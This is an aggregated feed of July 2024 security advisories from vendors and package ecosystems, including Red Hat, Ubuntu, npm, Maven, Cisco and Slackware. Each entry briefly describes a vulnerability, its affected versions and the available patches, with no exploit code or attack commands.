08.07.2024 03:00:00redhat[RHSA-2024:4351] virt:rhel and virt-devel:rhel security and bug fix update (low)Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems.Security Fix:* virt:rhel/libvirt: stack use-after-free in virNetClientIOEventLoop (CVE-2024-4418) Bug fix:* virsh destroy with --graceful destroyed a paused guest (qemu process paused by SIGSTOP) (JIRA:RHEL-36064)https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4351
08.07.2024 03:00:00redhat[RHSA-2024:4367] pki-core security update (important)The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.Security Fix(es):* dogtag ca: token authentication bypass vulnerability (CVE-2023-4727)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4367
08.07.2024 03:00:00redhat[RHSA-2024:4376] libreswan security update (moderate)Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network (VPN).Security Fix(es):* libreswan: IKEv1 default AH/ESP responder can crash and restart (CVE-2024-3652)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4376
08.07.2024 03:00:00redhat[RHSA-2024:4371] buildah security update (important)The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4371
08.07.2024 03:00:00redhat[RHSA-2024:4378] podman security update (important)The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods is a concept in Kubernetes.Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4378
08.07.2024 03:00:00redhat[RHSA-2024:4379] gvisor-tap-vsock security update (important)A replacement for libslirp and VPNKit, written in pure Go. It is based on the network stack of gVisor and is used to provide networking for podman-machine virtual machines. Compared to libslirp, gvisor-tap-vsock brings a configurable DNS server and dynamic port forwarding.Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4379
08.07.2024 03:00:00redhat[RHSA-2024:4352] kernel-rt security and bug fix update (important)The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: tls (CVE-2024-26585, CVE-2024-26584, CVE-2024-26583)* kernel-rt: kernel: PCI interrupt mapping cause oops [rhel-8] (CVE-2021-46909)* kernel: ipc/mqueue, msg, sem: avoid relying on a stack reference past its expiry (CVE-2021-47069)* kernel: hwrng: core - Fix page fault dead lock on mmap-ed hwrng (CVE-2023-52615)* kernel-rt: kernel: drm/amdgpu: use-after-free vulnerability (CVE-2024-26656)* kernel: Bluetooth: Avoid potential use-after-free in hci_error_reset (CVE-2024-26801)* kernel: Squashfs: check the inode number is not the invalid value of zero (CVE-2024-26982)* kernel: netfilter: nf_tables: use timestamp to check for set element timeout (CVE-2024-27397)* kernel: wifi: mac80211: (CVE-2024-35789, CVE-2024-35838, CVE-2024-35845)* kernel: wifi: nl80211: reject iftype change with mesh ID change (CVE-2024-27410)* kernel: perf/core: Bail out early if the request AUX area is out of bound (CVE-2023-52835)* kernel: TCP-spoofed ghost ACKs and leak initial sequence number (CVE-2023-52881)* kernel: Bluetooth BR/EDR PIN Pairing procedure is vulnerable to an impersonation attack (CVE-2020-26555)* kernel: ovl: fix leaked dentry (CVE-2021-46972)* kernel: platform/x86: dell-smbios-wmi: Fix oops on rmmod dell_smbios (CVE-2021-47073)* kernel: mm/damon/vaddr-test: memory leak in damon_do_test_apply_three_regions() (CVE-2023-52560)* kernel: ppp_async: limit MRU to 64K (CVE-2024-26675)* kernel: mm/swap: fix race when skipping swapcache (CVE-2024-26759)* kernel: RDMA/mlx5: Fix fortify source warning while accessing Eth segment (CVE-2024-26907)* kernel: x86/mm: Disallow vsyscall page read for copy_from_kernel_nofault() (CVE-2024-26906)* kernel: net: ip_tunnel: prevent perpetual headroom growth (CVE-2024-26804)* kernel: net/usb: kalmia: avoid printing uninitialized value on error path (CVE-2023-52703)* kernel: KVM: SVM: improper check in svm_set_x2apic_msr_interception allows direct access to host x2apic msrs (CVE-2023-5090)* kernel: EDAC/thunderx: Incorrect buffer size in drivers/edac/thunderx_edac.c (CVE-2023-52464)* kernel: ipv6: sr: fix possible use-after-free and null-ptr-deref (CVE-2024-26735)* kernel: mptcp: fix data re-injection from stale subflow (CVE-2024-26826)* kernel: net/bnx2x: Prevent access to a freed page in page_pool (CVE-2024-26859)* kernel: crypto: (CVE-2024-26974, CVE-2023-52813)* kernel: can: (CVE-2023-52878, CVE-2021-47456)* kernel: usb: (CVE-2023-52781, CVE-2023-52877)* kernel: net/mlx5e: fix a potential double-free in fs_any_create_groups (CVE-2023-52667)* kernel: usbnet: sanity check for maxpacket (CVE-2021-47495)* kernel: gro: fix ownership transfer (CVE-2024-35890)* kernel: erspan: make sure erspan_base_hdr is present in skb->head (CVE-2024-35888)* kernel: tipc: fix kernel warning when sending SYN message (CVE-2023-52700)* kernel: net/mlx5/mlxsw: (CVE-2024-35960, CVE-2024-36007, CVE-2024-35855)* kernel: net/mlx5e: (CVE-2024-35959, CVE-2023-52626, CVE-2024-35835)* kernel: mlxsw: (CVE-2024-35854, CVE-2024-35853, CVE-2024-35852)* kernel: net: (CVE-2024-35958, CVE-2021-47311, CVE-2021-47236, CVE-2021-47310)* kernel: i40e: Do not use WQ_MEM_RECLAIM flag for workqueue (CVE-2024-36004)* kernel: mISDN: fix possible use-after-free in HFC_cleanup() (CVE-2021-47356)* kernel: udf: Fix NULL pointer dereference in udf_symlink function (CVE-2021-47353)Bug Fix(es):* kernel-rt: update RT source tree to the latest RHEL-8.10.z kernel (JIRA:RHEL-40882)* [rhel8.9][cxgb4]BUG: using smp_processor_id() in preemptible [00000000] code: ethtool/54735 (JIRA:RHEL-8779)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4352
08.07.2024 21:38:40npm[NPM:GHSA-5F4X-HWV2-W9W2] rejetto HFS vulnerable to OS Command Execution by remote authenticated users (critical)rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5F4X-HWV2-W9W2
08.07.2024 03:00:00redhat[RHSA-2024:4211] kernel security and bug fix update (important)The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: Bluetooth BR/EDR PIN Pairing procedure is vulnerable to an impersonation attack (CVE-2020-26555)* kernel: TCP-spoofed ghost ACKs and leak initial sequence number (CVE-2023-52881, RHV-2024-1001)* kernel: ovl: fix leaked dentry (CVE-2021-46972)* kernel: platform/x86: dell-smbios-wmi: Fix oops on rmmod dell_smbios (CVE-2021-47073)* kernel: gro: fix ownership transfer (CVE-2024-35890)* kernel: tls: (CVE-2024-26584, CVE-2024-26583, CVE-2024-26585)* kernel: wifi: (CVE-2024-35789, CVE-2024-27410, CVE-2024-35838, CVE-2024-35845)* kernel: mlxsw: (CVE-2024-35855, CVE-2024-35854, CVE-2024-35853, CVE-2024-35852, CVE-2024-36007)* kernel: PCI interrupt mapping cause oops [rhel-8] (CVE-2021-46909)* kernel: ipc/mqueue, msg, sem: avoid relying on a stack reference past its expiry (CVE-2021-47069)* kernel: hwrng: core - Fix page fault dead lock on mmap-ed hwrng [rhel-8] (CVE-2023-52615)* kernel: net/mlx5e: (CVE-2023-52626, CVE-2024-35835, CVE-2023-52667, CVE-2024-35959)* kernel: drm/amdgpu: use-after-free vulnerability (CVE-2024-26656)* kernel: Bluetooth: Avoid potential use-after-free in hci_error_reset [rhel-8] (CVE-2024-26801)* kernel: Squashfs: check the inode number is not the invalid value of zero (CVE-2024-26982)* kernel: netfilter: nf_tables: use timestamp to check for set element timeout [rhel-8.10] (CVE-2024-27397)* kernel: mm/damon/vaddr-test: memory leak in damon_do_test_apply_three_regions() (CVE-2023-52560)* kernel: ppp_async: limit MRU to 64K (CVE-2024-26675)* kernel: x86/mm/swap: (CVE-2024-26759, CVE-2024-26906)* kernel: tipc: fix kernel warning when sending SYN message [rhel-8] (CVE-2023-52700)* kernel: RDMA/mlx5: Fix fortify source warning while accessing Eth segment (CVE-2024-26907)* kernel: erspan: make sure erspan_base_hdr is present in skb->head (CVE-2024-35888)* kernel: powerpc/imc-pmu/powernv: (CVE-2023-52675, CVE-2023-52686)* kernel: KVM: SVM: improper check in svm_set_x2apic_msr_interception allows direct access to host x2apic msrs (CVE-2023-5090)* kernel: EDAC/thunderx: Incorrect buffer size in drivers/edac/thunderx_edac.c (CVE-2023-52464)* kernel: ipv6: sr: fix possible use-after-free and null-ptr-deref (CVE-2024-26735)* kernel: mptcp: fix data re-injection from stale subflow (CVE-2024-26826)* kernel: crypto: (CVE-2024-26974, CVE-2023-52669, CVE-2023-52813)* kernel: net/mlx5/bnx2x/usb: (CVE-2024-35960, CVE-2024-35958, CVE-2021-47310, CVE-2024-26804, CVE-2021-47311, CVE-2024-26859, CVE-2021-47236, CVE-2023-52703)* kernel: i40e: Do not use WQ_MEM_RECLAIM flag for workqueue (CVE-2024-36004)* kernel: perf/core: Bail out early if the request AUX area is out of bound (CVE-2023-52835)* kernel: USB/usbnet: (CVE-2023-52781, CVE-2023-52877, CVE-2021-47495)* kernel: can: (CVE-2023-52878, CVE-2021-47456)* kernel: mISDN: fix possible use-after-free in HFC_cleanup() (CVE-2021-47356)* kernel: udf: Fix NULL pointer dereference in udf_symlink function (CVE-2021-47353)Bug Fix(es):* Kernel panic - kernel BUG at mm/slub.c:376! (JIRA:RHEL-29783)* Temporary values in FIPS integrity test should be zeroized [rhel-8.10.z] (JIRA:RHEL-35361)* RHEL8.6 - kernel: s390/cpum_cf: make crypto counters upward compatible (JIRA:RHEL-36048)* [RHEL8] blktests block/024 failed (JIRA:RHEL-8130)* RHEL8.9: EEH injections results Error: Power fault on Port 0 and other call traces (Everest/1050/Shiner) (JIRA:RHEL-14195)* Latency spikes with Matrox G200 graphic cards (JIRA:RHEL-36172)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4211
08.07.2024 20:05:42rustsec[RUSTSEC-2024-0346] Incorrect usage of `#[repr(packed)]`The affected versions make unsafe memory accesses under the assumption that `#[repr(packed)]` has a guaranteed field order. The Rust specification does not guarantee this, and https://github.com/rust-lang/rust/pull/125360 (1.80.0-beta) starts reordering fields of `#[repr(packed)]` structs, leading to illegal memory accesses.The patched versions `0.9.7` and `0.10.3` use `#[repr(C, packed)]`, which guarantees field order.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0346
08.07.2024 17:45:30rustsec[RUSTSEC-2024-0347] Incorrect usage of `#[repr(packed)]`The affected versions make unsafe memory accesses under the assumption that `#[repr(packed)]` has a guaranteed field order. The Rust specification does not guarantee this, and https://github.com/rust-lang/rust/pull/125360 (1.80.0-beta) starts reordering fields of `#[repr(packed)]` structs, leading to illegal memory accesses.The patched versions `0.9.7` and `0.10.4` use `#[repr(C, packed)]`, which guarantees field order.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0347
10.07.2024 00:41:16npm[NPM:GHSA-9JXC-QJR9-VJXQ] electron-updater Code Signing Bypass on Windows (high)### Observations The file `packages/electron-updater/src/windowsExecutableCodeSignatureVerifier.ts` implements the signature validation routine for Electron applications on Windows. It executes the following command in a new shell (`process.env.ComSpec` on Windows, usually `C:\Windows\System32\cmd.exe`): https://github.com/electron-userland/electron-builder/blob/140e2f0eb0df79c2a46e35024e96d0563355fc89/packages/electron-updater/src/windowsExecutableCodeSignatureVerifier.ts#L35-L41 Because of the surrounding shell, a first pass by `cmd.exe` expands any environment variable found in the command line above. ### Exploitation This creates a situation where `verifySignature()` can be tricked into validating the certificate of a different file than the one that was just downloaded. If the step is successful, the malicious update will be executed even if its signature is invalid. ### Impact This attack assumes a compromised update manifest (server compromise, Man-in-the-Middle attack if fetched over HTTP, Cross-Site Scripting to point the application to a malicious updater server, etc.). ### Patch This vulnerability was patched in #8295, by comparing the path in the output of `Get-AuthenticodeSignature` with the intended one. The patch is available starting from 6.3.0-alpha.6.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9JXC-QJR9-VJXQ
09.07.2024 20:05:30ubuntu[USN-6888-1] Django vulnerabilitiesSeveral security issues were fixed in Django.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6888-1
10.07.2024 00:13:50maven[MAVEN:GHSA-J4R7-P9FP-W3F3] Spring Cloud Function Framework vulnerable to Denial of Service (high)In Spring Cloud Function framework, versions 4.1.x prior to 4.1.2, 4.0.x prior to 4.0.8 an application is vulnerable to a DOS attack when attempting to compose functions with non-existing functions. Specifically, an application is vulnerable when all of the following are true: User is using Spring Cloud Function Web module. Affected Spring Products and Versions: Spring Cloud Function Framework 4.1.0 to 4.1.2, 4.0.0 to 4.0.8. References: https://spring.io/security/cve-2022-22979 https://checkmarx.com/blog/spring-function-cloud-dos-cve-2022-22979-and-unintended-function-invocation/ History: 2020-01-16: Initial vulnerability report published.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J4R7-P9FP-W3F3
09.07.2024 17:04:56ubuntu[USN-6887-1] OpenSSH vulnerability (high)OpenSSH could be made to expose timing information over the network.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6887-1
09.07.2024 16:32:38npm[NPM:GHSA-3G92-W8C5-73PQ] Undici vulnerable to data leak when using response.arrayBuffer() (low)### Impact Depending on network and process conditions of a `fetch()` request, `response.arrayBuffer()` might include a portion of memory from the Node.js process. ### Patches This has been patched in v6.19.2. ### Workarounds There are no known workarounds. ### References https://github.com/nodejs/undici/issues/3337 https://github.com/nodejs/undici/issues/3328 https://github.com/nodejs/undici/pull/3338 https://github.com/nodejs/undici/commit/f979ec3204ca489abf30e7d20e9fee9ea7711d36https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3G92-W8C5-73PQ
09.07.2024 15:12:13ubuntu[USN-6886-1] Go vulnerabilities (critical)Several security issues were fixed in Go.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6886-1
09.07.2024 04:11:28ubuntu[USN-6880-1] Tomcat vulnerability (high)Tomcat could allow unintended access to network services.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6880-1
10.07.2024 00:09:49maven[MAVEN:GHSA-CH7Q-GPFF-H9HP] Undertow Missing Release of Memory after Effective Lifetime vulnerability (moderate)A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CH7Q-GPFF-H9HP
09.07.2024 03:00:00cisa[CISA-2024:0709] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0709
09.07.2024 03:00:00gentoo[GLSA-202407-23] LIVE555 Media Server: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in LIVE555 Media Server, the worst of which could lead to a denial of service.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-23
09.07.2024 03:00:00redhat[RHSA-2024:4420] virt:rhel and virt-devel:rhel security update (important)Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems.Security Fix(es):* qemu-kvm: QEMU: 'qemu-img info' leads to host file read/write (CVE-2024-4467)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4420
09.07.2024 03:00:00redhat[RHSA-2024:4438] dotnet6.0 security update (moderate).NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.132 and Runtime 6.0.32.Security Fix(es):* dotnet: DoS when parsing X.509 Content and ObjectIdentifiers (CVE-2024-38095)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4438
09.07.2024 03:00:00redhat[RHSA-2024:4422] fence-agents security update (moderate)The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es):* urllib3: proxy-authorization request header is not stripped during cross-origin redirects (CVE-2024-37891)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4422
09.07.2024 03:00:00redhat[RHSA-2024:4439] dotnet6.0 security update (moderate).NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET 6.0 to SDK 6.0.132 and Runtime 6.0.32.Security Fix(es):* dotnet: DoS when parsing X.509 Content and ObjectIdentifiers (CVE-2024-38095)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4439
10.07.2024 00:04:45maven[MAVEN:GHSA-XPP6-8R3J-WW43] Undertow Denial of Service vulnerability (high)A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected `0\r\n` termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side open to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XPP6-8R3J-WW43
09.07.2024 15:36:52almalinux[ALSA-2024:4376] libreswan security update (moderate)libreswan security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4376
09.07.2024 15:30:05almalinux[ALSA-2024:4378] podman security update (important)podman security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4378
09.07.2024 15:27:50almalinux[ALSA-2024:4379] gvisor-tap-vsock security update (important)gvisor-tap-vsock security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4379
09.07.2024 15:31:42almalinux[ALSA-2024:4371] buildah security update (important)buildah security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4371
09.07.2024 20:03:54rubysec[RUBYSEC:RAILS_ADMIN-2024-39308] RailsAdmin Cross-site Scripting vulnerability in the list view (medium)### Impact RailsAdmin list view has the XSS vulnerability, caused by an improperly-escaped HTML title attribute. The issue was originally reported in https://github.com/railsadminteam/rails_admin/issues/3686. ### Patches Upgrade to [3.1.3](https://rubygems.org/gems/rails_admin/versions/3.1.3) or [2.3.0](https://rubygems.org/gems/rails_admin/versions/2.3.0). ### Workarounds 1. Copy the index view (located under the path `app/views/rails_admin/main/index.html.erb`) from the RailsAdmin version you use, and place it into your application by using the same path. 2. Open the view file in an editor, and remove `strip_tags` from the title attribute (as shown in the GHSA advisory below). **Note:** The view file created by this needs to be removed after upgrading RailsAdmin, unless this old view continues to be used. Only do this if you can't upgrade RailsAdmin now for a reason. ### References https://owasp.org/www-community/attacks/xss/ https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-strip_tagshttps://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RAILS_ADMIN-2024-39308
11.07.2024 00:11:08ubuntu[USN-6866-3] Linux kernel (Azure) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6866-3
11.07.2024 00:09:27ubuntu[USN-6868-2] Linux kernel (AWS) vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6868-2
11.07.2024 00:06:59ubuntu[USN-6892-1] Linux kernel (IBM) vulnerabilities (critical)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6892-1
10.07.2024 20:52:20slackware[SSA:2024-192-01] mozilla-firefoxNew mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/mozilla-firefox-115.13.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.13.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-30/ https://www.cve.org/CVERecord?id=CVE-2024-6600 https://www.cve.org/CVERecord?id=CVE-2024-6601 https://www.cve.org/CVERecord?id=CVE-2024-6602 https://www.cve.org/CVERecord?id=CVE-2024-6603 https://www.cve.org/CVERecord?id=CVE-2024-6604 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.13.0esr-i686-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.13.0esr-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.0esr-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.0esr-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: c90479ec0265464c811b4c24755bd9bd mozilla-firefox-115.13.0esr-i686-1_slack15.0.txz Slackware x86_64 15.0 package: cb81a75212824623a08350e8aa1c59bd mozilla-firefox-115.13.0esr-x86_64-1_slack15.0.txz Slackware -current package: d5e4a996eda4de0c2c2517e65ee9e980 xap/mozilla-firefox-128.0esr-i686-1.txz Slackware x86_64 -current package: e60e7cdfa3a548510c4254a31cdc909b xap/mozilla-firefox-128.0esr-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg mozilla-firefox-115.13.0esr-i686-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-192-01
10.07.2024 19:04:09maven[MAVEN:GHSA-77VC-RJ32-2R33] OpenSearch Observability does not properly restrict access to private tenant resources (moderate)### Summary An issue in the OpenSearch observability plugins allows unintended access to private tenant resources like notebooks. The system did not properly check if the user was the resource author when accessing resources in a private tenant, leading to potential data being revealed. ### Impact The lack of proper access control validation for private tenant resources in the OpenSearch observability and reporting plugins can lead to unintended data access. If an authorized user with observability or reporting roles is aware of another user's private tenant resource ID, such as a notebook, they can potentially read, modify, or take ownership of that resource, despite not being the original author, thus impacting the confidentiality and integrity of private tenant resources. The impact is confined to private tenant resources, where authorized users may gain inappropriate visibility into data intended to be private from other users within the same OpenSearch instance, potentially violating the intended separation of access. Impacted versions: <= 2.13 ### Patches The patches are included in OpenSearch 2.14 ### Workarounds None ### References OpenSearch 2.14 is available for download at https://opensearch.org/versions/opensearch-2-14-0.html The latest version of OpenSearch is available for download at https://opensearch.org/downloads.htmlhttps://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-77VC-RJ32-2R33
11.07.2024 00:32:34npm[NPM:GHSA-FQ54-2J52-JC42] Next.js Denial of Service (DoS) condition (high)### Impact A Denial of Service (DoS) condition was identified in Next.js. Exploitation of the bug can trigger a crash, affecting the availability of the server. **This vulnerability can affect all Next.js deployments on the affected versions.** ### Patches This vulnerability was resolved in Next.js 13.5 and later. We recommend that users upgrade to a safe version. ### Workarounds There are no official workarounds for this vulnerability. #### Credit We'd like to thank Thai Vu of [flyseccorp.com](http://flyseccorp.com/) for responsible disclosure of this vulnerability.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FQ54-2J52-JC42
10.07.2024 19:00:00cisco[CISCO-SA-XR-SECURE-BOOT-QUD5G8AP] Cisco IOS XR Software Secure Boot Bypass Vulnerability (high)A vulnerability in the boot process of Cisco IOS XR Software could allow an authenticated, local attacker with high privileges to bypass the Cisco Secure Boot functionality and load unverified software on an affected device. To exploit this successfully, the attacker must have root-system privileges on the affected device. This vulnerability is due to an error in the software build process. An attacker could exploit this vulnerability by manipulating the system's configuration options to bypass some of the integrity checks that are performed during the booting process. A successful exploit could allow the attacker to control the boot configuration, which could enable them to bypass the requirement to run Cisco signed images or alter the security properties of the running system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-XR-SECURE-BOOT-QUD5G8AP
10.07.2024 19:00:00cisco[CISCO-SA-RADIUS-SPOOFING-JULY-2024-87CCDWZ3] RADIUS Protocol Spoofing Vulnerability (Blast-RADIUS): July 2024 (high)On July 7, 2024, security researchers disclosed the following vulnerability in the RADIUS protocol:CVE-2024-3596: RADIUS Protocol under RFC 2865 is susceptible to forgery attacks by an on-path attacker who can modify any valid Response (Access-Accept, Access-Reject, or Access-Challenge) to any other response using a chosen-prefix collision attack against MD5 Response Authenticator signature.This vulnerability may impact any RADIUS client and server. For a description of this vulnerability, see VU#456537: RADIUS protocol susceptible to forgery attacks ["https://www.kb.cert.org/vuls/id/456537"].This advisory will be updated as additional information becomes available.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-RADIUS-SPOOFING-JULY-2024-87CCDWZ3
10.07.2024 17:15:50go[GO-2024-2979] Cache driver GetBlob() allows read access to any blob without access control check in zotregistry.dev/zot (medium)https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2979
11.07.2024 00:38:32npm[NPM:GHSA-W5FC-GJ3H-26RX] speaker vulnerable to Denial of Service (high)All versions of the package speaker are vulnerable to Denial of Service (DoS): providing unexpected input types to the channels property of the Speaker object makes it possible to reach an assert macro. Exploiting this vulnerability can lead to a process crash.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W5FC-GJ3H-26RX
11.07.2024 00:29:31npm[NPM:GHSA-WXR3-2HGV-QM8F] node-twain vulnerable to Improper Check or Handling of Exceptional Conditions (high)All versions of the package node-twain are vulnerable to Improper Check or Handling of Exceptional Conditions due to the length of the source data not being checked. Creating a new twain.TwainSDK with a productName or productFamily, manufacturer, version.info property of length >= 34 chars leads to a buffer overflow vulnerability.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WXR3-2HGV-QM8F
11.07.2024 00:28:43npm[NPM:GHSA-VJPV-X8P9-7P85] images vulnerable to Denial of Service (high)All versions of the package images are vulnerable to Denial of Service (DoS) due to providing unexpected input types to several different functions. This makes it possible to reach an assert macro, leading to a process crash.**Note:**By providing some specific integer values (like 0) to the size function, it is possible to obtain a Segmentation fault error, leading to the process crash.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VJPV-X8P9-7P85
10.07.2024 23:43:35npm[NPM:GHSA-G533-XQ5W-JMF3] node-stringbuilder vulnerable to Out-of-bounds Read (high)All versions of the package node-stringbuilder are vulnerable to Out-of-bounds Read due to incorrect memory length calculation, by calling ToBuffer, ToString, or CharAt on a StringBuilder object with a non-empty string value input. It's possible to return previously allocated memory, for example, by providing negative indexes, leading to an Information Disclosure.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G533-XQ5W-JMF3
10.07.2024 23:43:22npm[NPM:GHSA-7VHM-FMPH-7WXW] audify vulnerable to Improper Validation of Array Index (high)All versions of the package audify are vulnerable to Improper Validation of Array Index: when frameSize is provided to the new OpusDecoder().decode or new OpusDecoder().decodeFloat functions, it is not checked for negative values. This can lead to a process crash.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7VHM-FMPH-7WXW
10.07.2024 23:23:31npm[NPM:GHSA-43WQ-XRCM-3VGR] @discordjs/opus vulnerable to Denial of Service (high)All versions of the package @discordjs/opus are vulnerable to Denial of Service (DoS) due to providing an input object with a property toString to several different functions. Exploiting this vulnerability could lead to a system crash.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-43WQ-XRCM-3VGR
